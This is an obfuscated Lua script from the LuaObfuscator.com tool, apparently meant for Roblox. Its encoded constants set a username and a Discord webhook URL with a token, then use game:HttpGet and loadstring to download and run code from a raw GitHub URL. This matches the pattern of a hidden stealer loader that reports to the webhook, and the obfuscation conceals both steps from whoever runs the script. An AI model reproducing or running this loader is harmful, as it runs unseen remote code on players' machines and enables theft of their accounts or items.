--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==3) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v16=nil;v0=4;end if (v0==4) then v16=function(v21,v22,...)local v27=1;local v28;v21=v5(v4(v21,5),"..",function(v29)if (v2(v29,2)==79) then local v79=0;while true do if (v79==0) then v28=v1(v4(v29,1,1));return "";end end else local v80=v3(v1(v29,16));if v28 then local v97=v6(v80,v28);v28=nil;return v97;else return v80;end end end);local function v30(v31,v32,v33)if v33 then local v81=0 + 0 ;local v82;while true do if (0==v81) then v82=(v31/((1 + 1)^(v32-1)))%(2^(((v33-1) -(v32-(1449 -(438 + 1010)))) + 1 + 0)) ;return v82-(v82%(1 + (0 -0))) ;end end else local v83=(2 + 0)^(v32-((3 -1) -1)) ;return (((v31%(v83 + v83))>=v83) and (872 -(442 + 429))) or (0 -0) ;end end local function v34()local v47=v2(v21,v27,v27);v27=v27 + 1 ;return v47;end local function v35()local v48,v49=v2(v21,v27,v27 + (3 -1) );v27=v27 + (650 -(19 + 629)) ;return (v49 * (599 -(117 + 226))) + v48 ;end local function v36()local v50,v51,v52,v53=v2(v21,v27,v27 + 3 );v27=v27 + (6 -2) ;return (v53 * (5017809 + 11759407)) + (v52 * 65536) + (v51 * (699 -443)) + v50 ;end local function v37()local v54=v36();local v55=v36();local v56=1 -0 ;local v57=(v30(v55,(3 -2) + 0 ,1082 -(986 + (240 -(12 + 152))) ) * (((1427 -(757 + 669)) + 1)^(1349 -(148 + 1169)))) + v54 ;local v58=v30(v55,21,75 -44 );local v59=((v30(v55,104 -72 )==1) and  -((1 + 0) -0)) or (1716 -(1287 + 428)) ;if (v58==(0 -0)) then if (v57==(37 -(29 + 8))) then return v59 * (1808 -(1359 + (1016 -567))) ;else local v98=1200 -(985 + 215) ;while true do if (v98==(0 -0)) then v58=2 -1 ;v56=0 -0 ;break;end end end elseif (v58==(663 + 1384)) then return ((v57==(162 -(33 + 129))) and (v59 * (1/(381 -(265 + 116))))) or (v59 * NaN) ;end return v9(v59,v58-(4 + 203 + 816) ) * (v56 + (v57/((1 + 1)^(22 + (97 -67))))) ;end local function v38(v39)local v60=0 -(144 -(99 + 45)) ;local v61;local v62;while true do if (v60==(1 + 0)) then v61=v4(v21,v27,(v27 + v39) -(1 + 0) );v27=v27 + v39 ;v60=1435 -(791 + 642) ;end if (v60==((984 -(552 + 432)) + 0)) then v61=nil;if  not v39 then v39=v36();if (v39==(0 + 0 + 0)) then return "";end end v60=1 -0 ;end if (v60==(1 + 2)) then return v7(v62);end if (v60==(2 -0)) then v62={};for v99=1 + 0 , #v61 do v62[v99]=v3(v2(v4(v61,v99,v99)));end v60=12 -9 ;end end end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v63=0;local v64;local v65;local v66;local v67;local v68;local v69;while true do local v73=0 -0 ;while true do if (v73~=(1 -0)) then else if (v63==0) then local v105=0;local v106;while true do if (v105~=(0 -0)) then else v106=0;while true do if (2==v106) then v63=1;break;end if (v106==(326 -(168 + 158))) then local v127=189 -(61 + 128) ;while true do if (v127==0) then v64={};v65={};v127=1 + 0 ;end if (v127~=1) then else v106=1 + 0 ;break;end end end if (v106~=1) then else v66={};v67={v64,v65,nil,v66};v106=2 + 0 ;end end break;end end end break;end if (v73==(0 -0)) then if ((4 -3)==v63) then v68=v36();v69={};for v110=1,v68 do local v111=0 -0 ;local v112;local v113;local v114;local v115;local v116;while true do if (0==v111) then v112=0;v113=nil;v111=1;end if (v111==(1544 -(182 + 1361))) then v114=nil;v115=nil;v111=2;end if (v111==2) then v116=nil;while true do if (v112==(842 -(531 + 310))) then local v142=0;while true do if (v142~=(2 -1)) then else v112=2;break;end if (v142==(1908 -(1783 + 125))) then v115=nil;v116=nil;v142=1;end end end if (v112==2) then while true do if (v113~=(1 -0)) then else v116=nil;while true do if ((1 -0)~=v114) then else if (v115==(3 -2)) then v116=v34()~=0 ;elseif (v115==2) then v116=v37();elseif (v115==(8 -5)) then v116=v38();end v69[v110]=v116;break;end if (v114==0) then local v162=0;local v163;while true do if ((259 -(37 + 222))==v162) then v163=0 -0 ;while true do if (v163==1) then v114=2 -1 ;break;end if (v163~=0) then else local v178=0 + 0 ;while true do if (v178==0) then v115=v34();v116=nil;v178=1;end if (v178==(1 + 0)) then v163=1;break;end end end end break;end end end end break;end if (v113==0) then local v154=0;while true do if (v154==1) then v113=1 -0 ;break;end if ((0 -0)==v154) then v114=86 -(39 + 47) ;v115=nil;v154=1;end end end end break;end if (v112==0) then local v143=0;while true do if (v143~=(1 + 0)) then else v112=702 -(351 + 350) ;break;end if (v143~=(0 -0)) then else v113=0;v114=nil;v143=1;end end end end break;end end end v67[1 + 2 ]=v34();v63=1 + 1 ;end if (v63~=2) then else local v108=0 -0 ;while true do if (v108==1) then for v119=1,v36() do v66[v119]=v36();end return v67;end if (v108~=(406 -(159 + 247))) then else for v121=1 -0 ,v36() do local v122=0;local v123;local v124;while true do if (v122~=1) then else while true do if (v123==(0 -0)) then v124=v34();if (v30(v124,1 + 0 ,1 + 0 )~=0) then else local v155=0 -0 ;local v156;local v157;local v158;local v159;local v160;while true do if (v155==(1690 -(607 + 1082))) then v158=nil;v159=nil;v155=9 -7 ;end if (v155==(1 + 1)) then v160=nil;while true do if (v156==2) then while true do if (v157==3) then if (v30(v159,1998 -(1459 + 536) ,3)==1) then v160[4]=v69[v160[4]];end v64[v121]=v160;break;end if (v157==(2 -1)) then local v180=0 + 0 ;local v181;while true do if (v180==(0 -0)) then v181=0 + 0 ;while true do if (v181==(3 -2)) then v157=2;break;end if (v181==0) then local v197=0;while true do if (v197==0) then v160={v35(),v35(),nil,nil};if (v158==0) then local v198=0;local v199;local v200;local v201;while true do if (v198~=0) then else v199=0;v200=nil;v198=1;end if (v198~=1) then else v201=nil;while true do if (v199~=(1 + 0)) then else while true do if (v200==(0 + 0)) then v201=0;while true do if (v201==0) then v160[3]=v35();v160[4]=v35();break;end end break;end end break;end if ((0 -0)~=v199) then else local v204=1593 -(1120 + 473) ;while true do if (v204~=0) then else v200=0 + 0 ;v201=nil;v204=1;end if (v204==(1219 -(1015 + 203))) then v199=1 + 0 ;break;end end end end break;end end elseif (v158==1) then v160[8 -5 ]=v36();elseif (v158==(2 + 0)) then v160[3]=v36() -((495 -(192 + 301))^16) ;elseif (v158==(2 + 1)) then local v205=0 -0 ;local v206;local v207;while true do if (v205~=(0 -0)) then else v206=0 -0 ;v207=nil;v205=2 -1 ;end if ((3 -2)==v205) then while true do if (v206==(0 -0)) then v207=0 -0 ;while true do if (v207==0) then v160[1 + 2 ]=v36() -((1065 -(614 + 449))^(38 -(6 + 16))) ;v160[4]=v35();break;end end break;end end break;end end end v197=267 -(263 + 3) ;end if (v197~=(4 -3)) then else v181=3 -2 ;break;end end end end break;end end end if (v157~=(335 -(89 + 244))) then else local v182=0 -0 ;while true do if (v182~=1) then else v157=3;break;end if ((0 + 0)~=v182) then else if (v30(v159,2 -1 ,1)==1) then v160[2 + 0 ]=v69[v160[2]];end if (v30(v159,7 -5 ,2 -0 )~=(2 -1)) then else v160[3 + 0 ]=v69[v160[191 -(113 + 75) ]];end v182=1;end end end if (v157~=0) then else local v183=0;while true do if (v183==1) then v157=1;break;end if ((0 + 0)~=v183) then else v158=v30(v124,2,3 + 0 );v159=v30(v124,8 -4 ,6 + 0 );v183=1 + 0 ;end end end end break;end if (v156==1) then v159=nil;v160=nil;v156=864 -(819 + 43) ;end if (v156==0) then local v174=417 -(344 + 73) ;while true do if (0~=v174) then else v157=0 + 0 ;v158=nil;v174=1;end if (v174==1) then v156=1 + 0 ;break;end end end end break;end if (v155==0) then v156=0 + 0 ;v157=nil;v155=1 + 0 ;end end end break;end end break;end if (v122~=0) then else local v144=1101 -(262 + 839) ;while true do if (v144~=1) then else v122=1;break;end if (v144~=0) then else v123=0;v124=nil;v144=2 -1 ;end end end end end for v125=1,v36() do v65[v125-(3 -2) ]=v42();end v108=1;end end end v73=1;end end end end local function v43(v44,v45,v46)local v70=v44[1];local v71=v44[2];local v72=v44[3];return function(...)local v74=1;local v75= -1;local v76={...};local v77=v13("#",...) -1 ;local function v78()local v84=v70;local v85=v71;local v86=v72;local v87=v41;local v88={};local v89={};local v90={};for v94=0 + 0 ,v77 do if ((v94>=v86) or ((3270 + (344 -(140 + 3)))>(17081 -12681))) then v88[v94-v86 ]=v76[v94 + 1 ];else v90[v94]=v76[v94 + ((2591 -925) -(507 + 1158)) ];end end local v91=(v77-v86) + (1477 -(634 + 842)) ;local v92;local v93;while true do local v95=0 + 0 ;while true do if ((v95==(1217 -(189 + 301 + 726))) or ((1952 -(920 + (1310 -(411 + 143))))>(6894 -(12562 -8876)))) then if (((8119 -5474)<(935 + 3576)) and (v93<=(8 -(5 + 0)))) then if ((v93<=1) or ((4597 + 177)<=2487)) then if ((v93==((0 -0) + 0)) or ((4815 -3330)>(1781 + 180))) then local v128=1724 -(1455 + 269) ;local v129;while true do if (((4264 -((553 -244) + 666))<(6421 -2112)) and ((0 + 0 + 0)==v128)) then v129=v92[830 -(82 + (1749 -1003)) ];v90[v129]=v90[v129](v14(v90,v129 + 1 + (0 -0) ,v75));break;end end else v90[v92[111 -(90 + 19) ]]=v46[v92[3]];end elseif ((708<(3482 -(4110 -(1297 + 244)))) and (v93>(207 -(93 + 112)))) then v90[v92[3 -1 ]]=v92[3 + 0 ]~=0 ;else local v133=0;local v134;local v135;local v136;local v137;while true do if ((0==v133) or ((5693 -4108)==(3513 -(815 + 606)))) then v134=1210 -(310 + 900) ;v135=nil;v133=2 -1 ;end if ((v133==(1389 -(527 + 860))) or (((1760 -(330 + 337)) + 1130)<(754 -(122 + 436)))) then while true do if ((v134==(0 -0)) or ((948 -479)>(14458 -11011))) then v135=0 -0 ;v136=nil;v134=478 -(80 + 397) ;end if (((1721 + 531)<=(11358 -7968)) and (v134==(53 -((457 -(194 + 251)) + 40)))) then v137=nil;while true do if (((323 + 1655)<(2590 + 983)) and ((0 -0)==v135)) then local v166=(1477 -(17 + 1460)) -(810 -(560 + 250)) ;local v167;while true do if (((6002 -4109)==(3585 -1692)) and (v166==(0 -0))) then v167=0 -0 ;while true do if ((v167==(728 -(336 + (648 -257)))) or (1396>=(5325 -(85 + 623)))) then v135=1 + 0 ;break;end if ((v167==(0 + 0)) or (3056<=(1143 + 1567))) then local v184=0 -0 ;while true do if (((757 + 2162)>349) and (v184==(705 -(691 + 13)))) then v167=2 -1 ;break;end if ((v184==(0 -0)) or (1098>1387)) then v136=v92[2];v137=v90[v92[3]];v184=1 + 0 ;end end end end break;end end end if ((((1284 -(729 + 49)) + 73)==579) and (v135==(1477 -((3094 -1757) + 139)))) then v90[v136 + (1196 -(799 + 396)) ]=v137;v90[v136]=v137[v92[18 -14 ]];break;end end break;end end break;end if ((v133==(255 -(210 + 44))) or (((1789 -559) + 1272)<(873 + 23))) then v136=nil;v137=nil;v133=1160 -(799 + 359) ;end end end elseif (((185 + 2500)>=52) and (v93<=(13 -8))) then if (((2296 -1511)<=1041) and (v93==(254 -(46 + 204)))) then v46[v92[(1114 -(1108 + 3)) + 0 ]]=v90[v92[2]];else v90[v92[2 -0 ]]=v92[2 + (1189 -(757 + 431)) ];end elseif ((v93<=(7 -1)) or (((3510 -2802) + 880)>2196)) then v90[v92[7 -5 ]]();elseif (((5546 -(16 + (2700 -1751)))>=(5511 -2489)) and (v93==(4 + 3))) then do return;end else local v145=0 + 0 ;local v146;local v147;local v148;local v149;local v150;local v151;while true do if ((v145==((2 -1) + 0)) or ((2602 + 2185)<(2377 -(796 + 512)))) then v148=nil;v149=nil;v145=2 + 0 ;end if (((0 -0)==v145) or ((1540 + 2877)>=(3781 + 690))) then v146=0;v147=nil;v145=3 -2 ;end if ((v145==2) or (((8327 -4217) -2178)>2907)) then v150=nil;v151=nil;v145=(190 -(108 + 79)) + 0 ;end if ((v145==(638 -(119 + (856 -(50 + 290))))) or ((8045 -(17278 -11378))==((10112 + 1598) -7088))) then while true do if ((61<(6774 -3207)) and (v146==1)) then local v164=0;while true do if ((v164==1) or ((2597 -(76 + 589))>=2616)) then v146=1508 -(211 + 1295) ;break;end if (((3106 -1969)<=(9190 -5091)) and (v164==(0 + 0 + 0))) then v149=nil;v150=nil;v164=2 -1 ;end end end if ((v146==(2 + 0)) or (4394>(5908 -(311 + 968)))) then v151=nil;while true do if (((2 -0)==v147) or (1790<=(2622 -(19 + 1605)))) then for v175=v148,v75 do local v176=0 + 0 ;local v177;while true do if (((555 -(119 + 67))<(1577 + 1913)) and (v176==(1132 -(108 + 361 + (2060 -1397))))) then v177=1462 -(67 + 1395) ;while true do if (((5413 -(303 + 1051))>1023) and (v177==(0 -0))) then v151=v151 + ((2422 -1030) -(1331 + 60)) ;v90[v175]=v149[v151];break;end end break;end end end break;end if ((((3877 -(520 + 1114)) + 2685)>=(12115 -7804)) and (v147==(586 -(133 + 453)))) then local v171=1458 -(398 + 1060) ;local v172;while true do if (((274 + 1231)<=((9234 -5533) + 85)) and (v171==(0 + 0))) then v172=(0 -0) -0 ;while true do if ((v172==(788 -(478 + 310))) or ((3178 -(32 + 88))<=((2182 -(310 + 2)) -(264 + 382 + 764)))) then local v187=0 + 0 + 0 ;while true do if (((4325 -(304 + 20))>(2024 -(569 + 464))) and (v187==1)) then v172=1 -0 ;break;end if ((v187==0) or ((12309 -7475)<=(3565 + 1122))) then v148=v92[2 -0 ];v149,v150=v87(v90[v148](v14(v90,v148 + 1 ,v92[1 + 2 ])));v187=1 + 0 + 0 ;end end end if ((2084>=(4404 -3158)) and (v172==(1911 -(128 + 1782)))) then v147=1 + 0 ;break;end end break;end end end if (((3847 -(260 + 1154))>=823) and ((1 + 0)==v147)) then local v173=0 + 0 ;while true do if (((605 -467)<=1422) and (v173==1)) then v147=767 -(108 + 657) ;break;end if ((v173==0) or (4492<=(11221 -8969))) then v75=(v150 + v148) -(1456 -((1654 -657) + 458)) ;v151=(0 + 0) -0 ;v173=153 -(80 + 72) ;end end end end break;end if (((2958 -2164)<=(1418 -(292 + 188))) and (v146==(0 -0))) then local v165=0;while true do if ((v165==(0 + 0)) or ((12395 -8179)<=((334 -112) + 659 + 524))) then v147=76 -(19 + 57) ;v148=nil;v165=4 -3 ;end if (((8869 -6102)==(914 + 1853)) and (v165==1)) then v146=1;break;end end end end break;end end end v74=v74 + 1 + 0 ;break;end if (((3053 -(108 + 543))==(1188 + 1214)) and (v95==0)) then local v109=0 + 0 ;while true do if ((((1847 + 144) -640)==(3468 -(1204 + 913))) and (v109==(663 -(17 + 646)))) then v92=v84[v74];v93=v92[3 -2 ];v109=1 + 0 ;end if (((1790 -(1327 + 125))<(2750 -(588 + 142))) and (v109==(156 -(108 + 47)))) then v95=1;break;end end end end end end A,B=v41(v12(v78));if  not A[1] then local v96=v44[4][v74] or "?" ;error("Script error at ["   .. v96   .. "]:"   .. A[2] );else return v14(A,2,B);end end;end return v43(v42(),{},v22)(...);end;v16("LOL!083O0003083O00557365724E616D6503073O004372787A656E7403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039313931343633343639303330323031332F75385070635347386F69317053364A47766F312O6C6F6A425172496C5945646B35535A6E576661704A6E7037582D3141317246754F444E426E536F546B5F426B2D306854030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E000D3O0012053O00023O0012043O00013O0012053O00043O0012043O00033O0012013O00053O001201000100063O002002000100010007001205000300084O0003000400014O0008000100049O0000022O00063O000100012O00073O00017O000D3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00043O00053O00",v10(),...);break;end if (v0==2) then v9=math.ldexp;v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=3;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end end end
